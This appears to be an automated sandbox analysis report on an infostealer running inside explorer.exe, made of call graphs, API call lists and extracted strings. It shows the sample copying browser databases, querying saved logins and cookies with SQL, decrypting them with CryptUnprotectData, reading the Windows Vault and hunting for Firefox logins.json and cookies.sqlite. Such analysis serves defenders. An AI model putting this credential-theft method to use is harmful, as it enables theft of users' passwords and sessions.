27796 6e1cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27762->27796 27763->27762 27764->27762 27797 6e1162 VirtualQuery 27765->27797 27768 6e102d 27768->27718 27769 6e101d GetProcessHeap RtlFreeHeap 27769->27768 27770->27726 27772 6e19fa RegOpenKeyExW 27771->27772 27773 6e19f7 27771->27773 27774 6e1a28 RegQueryValueExW 27772->27774 27775 6e1aa2 27772->27775 27773->27772 27777 6e1a46 27774->27777 27778 6e1a94 RegCloseKey 27774->27778 27776 6e1ab9 27775->27776 27779 6e19e5 5 API calls 27775->27779 27776->27729 27777->27778 27785 6e1000 GetProcessHeap RtlAllocateHeap 27777->27785 27778->27775 27778->27776 27779->27776 27781 6e1a61 RegQueryValueExW 27782 6e1a8b 27781->27782 27783 6e1a7f 27781->27783 27784 6e1011 3 API calls 27782->27784 27783->27778 27784->27783 27785->27781 27787 6e1964 lstrlenW lstrlenW 27786->27787 27791 6e1000 GetProcessHeap RtlAllocateHeap 27787->27791 27790 6e1986 lstrcatW lstrcatW 27790->27734 27791->27790 27793 6e19bc 27792->27793 27795 6e19d4 27792->27795 27794 6e19c3 lstrlenW 27793->27794 27793->27795 27794->27795 27795->27742 27795->27743 27796->27762 27798 6e1019 27797->27798 27798->27768 27798->27769 28508 7355eb IsProcessorFeaturePresent 28509 6ed1f7 memset _allmul _allmul 28511 6e49f1 13 API calls 28610 6f9ff0 31 API calls 27987 6e9fc8 27988 6e9fd3 27987->27988 27990 6e9fd8 27987->27990 27989 6e9ff4 HeapCreate 27989->27988 27991 6ea004 27989->27991 27990->27988 27990->27989 27993 6e7f70 17 API calls 27991->27993 27993->27988 28233 6e15dd 28234 6e15f3 lstrlen 28233->28234 28235 6e1600 28233->28235 28234->28235 28244 6e1000 GetProcessHeap RtlAllocateHeap 28235->28244 28237 6e1608 lstrcat 28238 6e163d lstrcat 28237->28238 28239 6e1644 28237->28239 28238->28239 28245 6e1333 28239->28245 28242 6e1011 3 API calls 28243 6e1667 28242->28243 28244->28237 28268 6e1000 GetProcessHeap RtlAllocateHeap 28245->28268 28247 6e1357 28269 6e106c lstrlen MultiByteToWideChar 28247->28269 28249 6e1366 28270 6e12a3 RtlZeroMemory 28249->28270 28252 6e13b8 RtlZeroMemory 28256 6e13ed 28252->28256 28253 6e1011 3 API calls 28254 6e15d2 28253->28254 28254->28242 28255 6e15b5 28255->28253 28256->28255 28272 6e1000 GetProcessHeap RtlAllocateHeap 28256->28272 28258 6e14a7 wsprintfW 28260 6e14c9 28258->28260 28259 6e15a1 28261 6e1011 3 API calls 28259->28261 28260->28259 28273 6e1000 GetProcessHeap RtlAllocateHeap 28260->28273 28261->28255 28263 6e159a 28266 6e1011 3 API calls 28263->28266 28264 6e1533 28264->28263 28274 6e104c VirtualAlloc 28264->28274 28266->28259 28267 6e158a RtlMoveMemory 28267->28263 28268->28247 28269->28249 28271 6e12c5 28270->28271 28271->28252 28271->28255 28272->28258 28273->28264 28274->28267 28275 6e63dd 28277 6eb87b 20 API calls 28275->28277 28276 6e63f4 28277->28276 28612 7173c4 22 API calls 28312 6e43d9 28319 6e4317 _alloca_probe RegOpenKeyW 28312->28319 28315 6e4317 25 API calls 28316 6e43f5 28315->28316 28317 6e4317 25 API calls 28316->28317 28318 6e4403 28317->28318 28320 6e43cf 28319->28320 28321 6e4343 RegEnumKeyExW 28319->28321 28320->28315 28322 6e43c4 RegCloseKey 28321->28322 28326 6e436d 28321->28326 28322->28320 28323 6e1953 6 API calls 28323->28326 28324 6e199d 9 API calls 28324->28326 28326->28323 28326->28324 28327 6e1011 3 API calls 28326->28327 28330 6e418a 16 API calls 28326->28330 28328 6e439b RegEnumKeyExW 28327->28328 28328->28326 28329 6e43c3 28328->28329 28329->28322 28330->28326 28613 6eebd9 35 API calls 28614 7013ca 87 API calls 28514 733dc8 24 API calls 28618 7233b7 27 API calls 28516 709dbc 25 API calls 28619 7013ca 87 API calls 28517 6f11a0 41 API calls 28620 708ba6 7 API calls 28621 7253ad memset memcpy memset memcpy 28622 6fab8b 19 API calls 28623 7013ca 86 API calls 28099 6e639e 28103 6eb1e5 28099->28103 28123 6eb1e3 28099->28123 28100 6e63b2 28104 6eb20d 28103->28104 28105 6eb214 28103->28105 28157 6eaeea 28104->28157 28107 6eb233 28105->28107 28109 6eb28f 28105->28109 28175 6eae65 28105->28175 28107->28109 28143 6ea7ae 28107->28143 28109->28100 28111 6eb26d 28181 6ea1c6 18 API calls 28111->28181 28112 6eb2d6 28154 6e6a5a 28112->28154 28118 6eb310 CreateFileMappingW 28119 6eb37e 28118->28119 28120 6eb32b MapViewOfFile 28118->28120 28182 6ea1c6 18 API calls 28119->28182 28120->28119 28121 6eb2e8 28120->28121 28121->28109 28121->28118 28124 6eb1e5 28123->28124 28125 6eb214 28124->28125 28126 6eaeea 25 API calls 28124->28126 28127 6eb233 28125->28127 28128 6eae65 21 API calls 28125->28128 28129 6eb28f 28125->28129 28126->28125 28127->28129 28130 6ea7ae 18 API calls 28127->28130 28128->28127 28129->28100 28133 6eb267 28130->28133 28131 6eb26d 28230 6ea1c6 18 API calls 28131->28230 28132 6eb2d6 28134 6e6a5a 17 API calls 28132->28134 28133->28129 28133->28131 28133->28132 28136 6ea67c 21 API calls 28133->28136 28141 6eb2e8 28134->28141 28137 6eb2be 28136->28137 28137->28131 28137->28132 28138 6eb310 CreateFileMappingW 28139 6eb37e 28138->28139 28140 6eb32b MapViewOfFile 28138->28140 28231 6ea1c6 18 API calls 28139->28231 28140->28139 28140->28141 28141->28129 28141->28138 28145 6ea7c7 28143->28145 28144 6ea805 28144->28109 28144->28111 28144->28112 28147 6ea67c 28144->28147 28145->28144 28183 6ea1c6 18 API calls 28145->28183 28148 6ea694 _alldiv _allmul 28147->28148 28149 6ea6c1 28147->28149 28148->28149 28184 6ea33b SetFilePointer 28149->28184 28152 6ea6ee 28152->28111 28152->28112 28155 73307c 17 API calls 28154->28155 28156 6e6a65 28155->28156 28156->28121 28158 6e6a81 memset 28157->28158 28159 6eaf01 28158->28159 28160 6e6a81 memset 28159->28160 28166 6eaf07 28159->28166 28161 6eaf2a 28160->28161 28161->28166 28190 6e7f07 28161->28190 28164 6eaf54 28164->28166 28193 7352ae 28164->28193 28166->28105 28168 6eaffa 28169 6eb020 28168->28169 28170 6eb000 28168->28170 28171 6eae65 21 API calls 28169->28171 28216 6ea1c6 18 API calls 28170->28216 28173 6eb01c 28171->28173 28173->28166 28211 6eadcc 28173->28211 28176 6eae7a 28175->28176 28177 6eae83 28176->28177 28178 6ea67c 21 API calls 28176->28178 28177->28107 28179 6eaea5 28178->28179 28179->28177 28229 6ea1c6 18 API calls 28179->28229 28181->28109 28182->28109 28183->28144 28185 6ea36a 28184->28185 28187 6ea390 28184->28187 28185->28187 28189 6ea1c6 18 API calls 28185->28189 28187->28152 28188 6ea1c6 18 API calls 28187->28188 28188->28152 28189->28187 28217 6e7ec7 28190->28217 28194 7352bb 28193->28194 28196 6eafd9 28194->28196 28222 71ba08 _allmul 28194->28222 28197 6eb87b 28196->28197 28198 6eb88d memset 28197->28198 28203 6eb8e5 28198->28203 28200 6eb609 memset 28200->28203 28201 6eba3c 28201->28168 28203->28198 28203->28200 28203->28201 28205 6eba41 28203->28205 28206 6eba14 28203->28206 28223 6eb64b 18 API calls 28203->28223 28224 6ebb9f 18 API calls 28203->28224 28225 6ea2aa 17 API calls 28203->28225 28210 7352ae _allmul 28205->28210 28226 6ea1c6 18 API calls 28206->28226 28208 6eba32 28227 734db2 17 API calls 28208->28227 28210->28201 28214 6eade4 28211->28214 28212 6eae5f 28212->28166 28214->28212 28215 6ebafc 20 API calls 28214->28215 28228 6ea39e 18 API calls 28214->28228 28215->28214 28216->28173 28218 6e7ed9 28217->28218 28220 6e7ed4 28217->28220 28221 6e6e6a 17 API calls 28218->28221 28220->28164 28221->28220 28222->28196 28223->28203 28224->28203 28225->28203 28226->28208 28227->28201 28228->28214 28229->28177 28230->28129 28231->28129 28278 6e1b9d 28279 6e1ba2 28278->28279 28280 6e1bc1 28278->28280 28279->28280 28281 6e1ba9 GetFileAttributesW 28279->28281 28282 6e1bb5 28281->28282 28626 6ebf9a _alldiv 28519 6e1198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28520 6ffd97 19 API calls 28521 707d8b _allrem memcpy 28628 6fcb91 18 API calls

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 0 6e3717-6e3730 call 6e1b6a 3 6e3736-6e374c 0->3 4 6e3c37-6e3c3d 0->4 5 6e374e-6e3757 call 6e302d 3->5 6 6e3762-6e379c call 6e1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->6 9 6e375c-6e375e 5->9 11 6e379e-6e37a3 call 6e349b 6->11 12 6e37a8-6e37b5 call 734bec 6->12 9->6 11->12 16 6e37bb-6e37d3 call 71eeb8 12->16 17 6e3c15-6e3c1e DeleteFileW call 6e1011 12->17 22 6e3c0c-6e3c10 call 733848 16->22 23 6e37d9-6e37f1 call 6e1000 call 7002ec 16->23 21 6e3c23-6e3c28 17->21 21->4 24 6e3c2a-6e3c32 call 6e2ffa 21->24 22->17 31 6e37f7 23->31 32 6e3bd0-6e3be3 call 6ffb92 lstrlen 23->32 24->4 34 6e37fc-6e3816 call 6e1fa7 31->34 38 6e3c05-6e3c07 call 6e1011 32->38 39 6e3be5-6e3c00 call 6e1798 * 3 32->39 40 6e381c-6e382d 34->40 41 6e3bb6-6e3bc6 call 7002ec 34->41 38->22 39->38 44 6e3a37-6e3a51 CryptUnprotectData 40->44 45 6e3833-6e3843 RtlCompareMemory 40->45 41->34 55 6e3bcc 41->55 44->41 51 6e3a57-6e3a5c 44->51 45->44 49 6e3849-6e384b 45->49 49->44 54 6e3851-6e3856 49->54 51->41 52 6e3a62-6e3a78 call 6e1fa7 51->52 61 6e3a7a-6e3a80 52->61 62 6e3a86-6e3a9d call 6e1fa7 52->62 54->44 58 6e385c-6e3861 54->58 55->32 58->44 60 6e3867-6e38ed RtlZeroMemory call 6e1000 58->60 73 6e3a2e-6e3a32 60->73 74 6e38f3-6e3909 call 6e1fa7 60->74 61->62 64 6e3a82 61->64 68 6e3a9f-6e3aa5 62->68 69 6e3aab-6e3ac2 call 6e1fa7 62->69 64->62 68->69 71 6e3aa7 68->71 79 6e3ac4-6e3aca 69->79 80 6e3ad0-6e3aed call 6e1fa7 69->80 71->69 77 6e3bb1 call 6e1011 73->77 84 6e390b-6e3911 74->84 85 6e3917-6e392d call 6e1fa7 74->85 77->41 79->80 83 6e3acc 79->83 89 6e3aef-6e3af1 80->89 90 6e3af7-6e3b01 80->90 83->80 84->85 88 6e3913 84->88 93 6e392f-6e3935 85->93 94 6e393b-6e3952 call 6e1fa7 85->94 88->85 89->90 92 6e3af3 89->92 95 6e3b0f-6e3b1b lstrlen 90->95 96 6e3b03-6e3b05 90->96 92->90 93->94 97 6e3937 93->97 103 6e3954-6e395a 94->103 104 6e3960-6e3979 call 6e1fa7 94->104 95->41 100 6e3b21-6e3b2a lstrlen 95->100 96->95 99 6e3b07-6e3b0b 96->99 97->94 99->95 100->41 102 6e3b30-6e3b4f call 6e1000 100->102 110 6e3b59-6e3b93 call 6e2112 wsprintfA lstrlen 102->110 111 6e3b51 102->111 103->104 106 6e395c 103->106 112 6e397b-6e3981 104->112 113 6e3987-6e3993 lstrlen 104->113 106->104 118 6e3b95-6e3ba1 call 6e102f 110->118 119 6e3ba3-6e3baf lstrcat 110->119 111->110 112->113 116 6e3983 112->116 113->73 115 6e3999-6e39a2 lstrlen 113->115 115->73 120 6e39a8-6e39c7 call 6e1000 115->120 116->113 118->119 119->77 125 6e39c9 120->125 126 6e39d1-6e3a0b call 6e2112 wsprintfA lstrlen 120->126 125->126 129 6e3a0d-6e3a19 call 6e102f 126->129 130 6e3a1b-6e3a29 lstrcat call 6e1011 126->130 129->130 130->73
                                                                                            APIs
                                                                                              • Part of subcall function 006E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
                                                                                              • Part of subcall function 006E1B6A: CloseHandle.KERNELBASE(00000000), ref: 006E1B8F
                                                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 006E3778
                                                                                            • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 006E3782
                                                                                            • DeleteFileW.KERNELBASE(00000000), ref: 006E3789
                                                                                            • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 006E3794
                                                                                            • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 006E383B
                                                                                            • RtlZeroMemory.NTDLL(?,00000040), ref: 006E3870
                                                                                            • lstrlen.KERNEL32(?,?,?,?,?), ref: 006E398B
                                                                                            • lstrlen.KERNEL32(00000000), ref: 006E399A
                                                                                            • wsprintfA.USER32 ref: 006E39F1
                                                                                            • lstrlen.KERNEL32(00000000,?,?), ref: 006E39FD
                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 006E3A21
                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006E3A49
                                                                                            • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 006E3B13
                                                                                            • lstrlen.KERNEL32(00000000), ref: 006E3B22
                                                                                            • wsprintfA.USER32 ref: 006E3B79
                                                                                            • lstrlen.KERNEL32(00000000), ref: 006E3B85
                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 006E3BA9
                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 006E3BDA
                                                                                            • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 006E3C16
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                            • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                                                            • API String ID: 584740257-404540950
                                                                                            • Opcode ID: 31130a8774816bdb3ec2b4f542a81e7fb5135f7783b83731a19975052f81c530
                                                                                            • Instruction ID: ec9aa9e9f404efa426bec8b684020718a6ca498cc789244fd5ab3343ab56220a
                                                                                            • Opcode Fuzzy Hash: 31130a8774816bdb3ec2b4f542a81e7fb5135f7783b83731a19975052f81c530
                                                                                            • Instruction Fuzzy Hash: 81E1BE7060A391AFE715DF26C888A6FBBEAAF85744F04882CF4858B351DB35CD44CB56

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 134 6e2198-6e21c9 RtlZeroMemory GetVersionExW 135 6e21cb-6e21d0 134->135 136 6e21d7-6e21dc 134->136 137 6e21de 135->137 138 6e21d2 135->138 136->137 139 6e21e3-6e21f6 LoadLibraryW 136->139 137->139 138->136 140 6e21fc-6e223e GetProcAddress * 5 139->140 141 6e249b-6e24a3 139->141 142 6e2244-6e224a 140->142 143 6e2492-6e249a FreeLibrary 140->143 142->143 144 6e2250-6e2252 142->144 143->141 144->143 145 6e2258-6e225a 144->145 145->143 146 6e2260-6e2265 145->146 146->143 147 6e226b-6e2277 146->147 148 6e227e-6e2280 147->148 148->143 149 6e2286-6e22a5 148->149 151 6e248b-6e248f 149->151 152 6e22ab-6e22b3 149->152 151->143 153 6e22b9-6e22c5 152->153 154 6e2483 152->154 155 6e22c9-6e22db 153->155 154->151 156 6e2365-6e2375 RtlCompareMemory 155->156 157 6e22e1-6e22f1 RtlCompareMemory 155->157 158 6e237b-6e23c9 call 6e1953 * 3 156->158 159 6e2452-6e2475 156->159 157->159 160 6e22f7-6e2348 call 6e1953 * 3 157->160 176 6e23cb-6e23dc call 6e1953 158->176 177 6e23e4-6e23ea 158->177 159->155 161 6e247b-6e247f 159->161 160->177 178 6e234e-6e2363 call 6e1953 160->178 161->154 190 6e23e0 176->190 181 6e23ec-6e23ee 177->181 182 6e2431-6e2433 177->182 178->190 187 6e242a-6e242c call 6e1011 181->187 188 6e23f0-6e23f2 181->188 184 6e243c-6e243e 182->184 185 6e2435-6e2437 call 6e1011 182->185 192 6e2447-6e2449 184->192 193 6e2440-6e2442 call 6e1011 184->193 185->184 187->182 188->187 194 6e23f4-6e23f6 188->194 190->177 192->159 197 6e244b-6e244d call 6e1011 192->197 193->192 194->187 196 6e23f8-6e2406 StrStrIW 194->196 198 6e2408-6e2421 call 6e17c0 * 3 196->198 199 6e2426 196->199 197->159 198->199 199->187
                                                                                            APIs
                                                                                            • RtlZeroMemory.NTDLL(?,00000114), ref: 006E21AF
                                                                                            • GetVersionExW.KERNEL32(?), ref: 006E21BE
                                                                                            • LoadLibraryW.KERNELBASE(vaultcli.dll), ref: 006E21E8
                                                                                            • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 006E220A
                                                                                            • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 006E2214
                                                                                            • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 006E2220
                                                                                            • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 006E222A
                                                                                            • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 006E2236
                                                                                            • RtlCompareMemory.NTDLL(?,00741110,00000010), ref: 006E22E8
                                                                                            • RtlCompareMemory.NTDLL(?,00741110,00000010), ref: 006E236C
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994
                                                                                            • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 006E23FE
                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 006E2493
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                                                            • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                            • API String ID: 2583887280-2831467701
                                                                                            • Opcode ID: 52615efd3ecce01e6c26379cf0dab43e5a7faf74b48a5813cb86a4a46d668b23
                                                                                            • Instruction ID: b430acb6eb9d66a2ecc7c828179bfd6c26e0ffec78c51c40cab9eca0828a0f1f
                                                                                            • Opcode Fuzzy Hash: 52615efd3ecce01e6c26379cf0dab43e5a7faf74b48a5813cb86a4a46d668b23
                                                                                            • Instruction Fuzzy Hash: 63919C71A09382AFD714DF62C895A6FBBEBAF89704F00882DF5859B251DB74D801CB52

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 261 6e3098-6e30b1 call 6e1b6a 264 6e33ba-6e33c0 261->264 265 6e30b7-6e30cd 261->265 266 6e30cf-6e30d8 call 6e302d 265->266 267 6e30e3-6e3128 call 6e1000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call 734bec 265->267 270 6e30dd-6e30df 266->270 274 6e312e-6e3146 call 71eeb8 267->274 275 6e339b-6e33a4 DeleteFileW call 6e1011 267->275 270->267 280 6e314c-6e3158 call 7002ec 274->280 281 6e3392-6e3396 call 733848 274->281 279 6e33a9-6e33ab 275->279 279->264 282 6e33ad-6e33b5 call 6e2ffa 279->282 287 6e315e-6e3161 280->287 288 6e3389-6e338d call 6ffb92 280->288 281->275 282->264 290 6e3165-6e317f call 6e1fa7 287->290 288->281 293 6e336f-6e337b call 7002ec 290->293 294 6e3185-6e3196 290->294 293->290 301 6e3381-6e3385 293->301 296 6e319c-6e31ac RtlCompareMemory 294->296 297 6e32cd-6e32e7 CryptUnprotectData 294->297 296->297 300 6e31b2-6e31b4 296->300 297->293 299 6e32ed-6e32f2 297->299 299->293 302 6e32f4-6e330a call 6e1fa7 299->302 300->297 303 6e31ba-6e31bf 300->303 301->288 308 6e330c-6e3312 302->308 309 6e3318-6e332f call 6e1fa7 302->309 303->297 304 6e31c5-6e31ca 303->304 304->297 306 6e31d0-6e3253 RtlZeroMemory call 6e1000 304->306 319 6e32bd 306->319 320 6e3255-6e326b call 6e1fa7 306->320 308->309 311 6e3314 308->311 315 6e333d-6e3343 309->315 316 6e3331-6e3337 309->316 311->309 321 6e3345-6e334b 315->321 322 6e3351-6e336a call 6e1798 * 3 315->322 316->315 318 6e3339 316->318 318->315 324 6e32c1-6e32c8 call 6e1011 319->324 330 6e326d-6e3273 320->330 331 6e3279-6e328e call 6e1fa7 320->331 321->322 325 6e334d 321->325 322->293 324->293 325->322 330->331 334 6e3275 330->334 339 6e329c-6e32bb call 6e1798 * 3 331->339 340 6e3290-6e3296 331->340 334->331 339->324 340->339 342 6e3298 340->342 342->339
                                                                                            APIs
                                                                                              • Part of subcall function 006E1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000,00000000,006E2893,00000000,00000000,00000000,?), ref: 006E1B82
                                                                                              • Part of subcall function 006E1B6A: CloseHandle.KERNELBASE(00000000), ref: 006E1B8F
                                                                                            • GetTempPathW.KERNEL32(00000104,00000000), ref: 006E30F9
                                                                                            • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 006E3103
                                                                                            • DeleteFileW.KERNELBASE(00000000), ref: 006E310A
                                                                                            • CopyFileW.KERNELBASE(?,00000000,00000000), ref: 006E3115
                                                                                            • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 006E31A4
                                                                                            • RtlZeroMemory.NTDLL(?,00000040), ref: 006E31D7
                                                                                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 006E32DF
                                                                                            • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 006E339C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                                                            • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                                                            • API String ID: 2757140130-4052020286
                                                                                            • Opcode ID: 73fcf0006881dbbe7616522a19b51d9307156ad354e09354f4eeeed1838328d5
                                                                                            • Instruction ID: 89a92677bd57e6526082bc2cc2907ea392a75ff97260d3ae76bfde2291582840
                                                                                            • Opcode Fuzzy Hash: 73fcf0006881dbbe7616522a19b51d9307156ad354e09354f4eeeed1838328d5
                                                                                            • Instruction Fuzzy Hash: 52919B70209381AFE710DF26C848E6FBBEAAF86744F04492CF58597391DB35DE448B66

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 413 6e3ed9-6e3ee7 414 6e3eed-6e3ef1 413->414 415 6e3fd1-6e3fdb 413->415 414->415 416 6e3ef7-6e3f21 call 6e1000 PathCombineW FindFirstFileW 414->416 419 6e3fca-6e3fcc call 6e1011 416->419 420 6e3f27-6e3f30 416->420 419->415 421 6e3f78-6e3f86 lstrcmpiW 420->421 422 6e3f32-6e3f40 lstrcmpiW 420->422 424 6e3faf-6e3fbd FindNextFileW 421->424 425 6e3f88-6e3fa3 call 6e1000 PathCombineW call 6e3e04 421->425 422->424 426 6e3f42-6e3f54 lstrcmpiW 422->426 424->420 428 6e3fc3-6e3fc4 FindClose 424->428 435 6e3fa8-6e3faa call 6e1011 425->435 426->424 429 6e3f56-6e3f71 call 6e1000 PathCombineW call 6e3ed9 426->429 428->419 436 6e3f76 429->436 435->424 436->435
                                                                                            APIs
                                                                                              • Part of subcall function 006E1000: GetProcessHeap.KERNEL32(00000008,?,006E11C7,?,?,00000001,00000000,?), ref: 006E1003
                                                                                              • Part of subcall function 006E1000: RtlAllocateHeap.NTDLL(00000000), ref: 006E100A
                                                                                            • PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 006E3F0A
                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 006E3F16
                                                                                            • lstrcmpiW.KERNEL32(?,007362CC), ref: 006E3F38
                                                                                            • lstrcmpiW.KERNEL32(?,007362D0), ref: 006E3F4C
                                                                                            • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 006E3F69
                                                                                            • lstrcmpiW.KERNEL32(?,Local State), ref: 006E3F7E
                                                                                            • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 006E3F9B
                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 006E3FB5
                                                                                            • FindClose.KERNELBASE(00000000), ref: 006E3FC4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                                                            • String ID: *.*$Local State
                                                                                            • API String ID: 3923353463-3324723383
                                                                                            • Opcode ID: 74fe72e0f915474cfc79e37a5ea9a3568110000b1af9137f29e75f90941cd610
                                                                                            • Instruction ID: e16ccf8ef76533571eaf3a686d865f98b974207147ac2a5580349fada97a0548
                                                                                            • Opcode Fuzzy Hash: 74fe72e0f915474cfc79e37a5ea9a3568110000b1af9137f29e75f90941cd610
                                                                                            • Instruction Fuzzy Hash: 9221A4316013947BE754AB328C4DE7F766EDF82702F04851DB812C7392EF789A488669

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 438 6e2b15-6e2b48 call 6e1953 FindFirstFileW 442 6e2b4e 438->442 443 6e2c5c-6e2c74 call 6e1011 * 2 438->443 444 6e2b52-6e2b57 442->444 446 6e2bc8-6e2bef call 6e1953 call 6e199d StrStrIW 444->446 447 6e2b59-6e2b6b lstrcmpiW 444->447 461 6e2c10-6e2c1e StrStrIW 446->461 462 6e2bf1-6e2bfa call 6e1cf7 446->462 450 6e2c3d-6e2c4b FindNextFileW 447->450 451 6e2b71-6e2b83 lstrcmpiW 447->451 450->444 455 6e2c51-6e2c58 FindClose 450->455 451->450 456 6e2b89-6e2b94 call 6e19b4 451->456 455->443 463 6e2b9d 456->463 464 6e2b96-6e2b9b 456->464 466 6e2c36-6e2c38 call 6e1011 461->466 467 6e2c20-6e2c29 call 6e1cf7 461->467 462->461 473 6e2bfc-6e2c0b call 6e278e 462->473 465 6e2b9f-6e2bc3 call 6e1953 call 6e199d call 6e2ae9 call 6e1011 463->465 464->465 465->446 466->450 467->466 478 6e2c2b-6e2c31 call 6e287d 467->478 473->461 478->466
                                                                                            APIs
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,006E2F0C), ref: 006E1973
                                                                                              • Part of subcall function 006E1953: lstrlenW.KERNEL32(00736564,?,?,006E2F0C), ref: 006E1978
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,?,?,?,006E2F0C), ref: 006E1990
                                                                                              • Part of subcall function 006E1953: lstrcatW.KERNEL32(00000000,00736564,?,?,006E2F0C), ref: 006E1994
                                                                                            • FindFirstFileW.KERNELBASE(00000000,?,00000000,00000000,?,00000000), ref: 006E2B3D
                                                                                            • lstrcmpiW.KERNEL32(?,007362CC), ref: 006E2B63
                                                                                            • lstrcmpiW.KERNEL32(?,007362D0), ref: 006E2B7B
                                                                                              • Part of subcall function 006E19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,006E2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 006E19C4
                                                                                            • StrStrIW.SHLWAPI(00000000,logins.json), ref: 006E2BE7
                                                                                            • StrStrIW.SHLWAPI(00000000,cookies.sqlite), ref: 006E2C16
                                                                                            • FindNextFileW.KERNELBASE(00000000,00000010), ref: 006E2C43
                                                                                            • FindClose.KERNELBASE(00000000), ref: 006E2C52
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.3152220899.00000000006E1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006E1000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_6e1000_explorer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Findlstrlen$Filelstrcatlstrcmpi$CloseFirstNext
                                                                                            • String ID: \*.*$cookies.sqlite$logins.json
                                                                                            • API String ID: 1108783765-3717368146
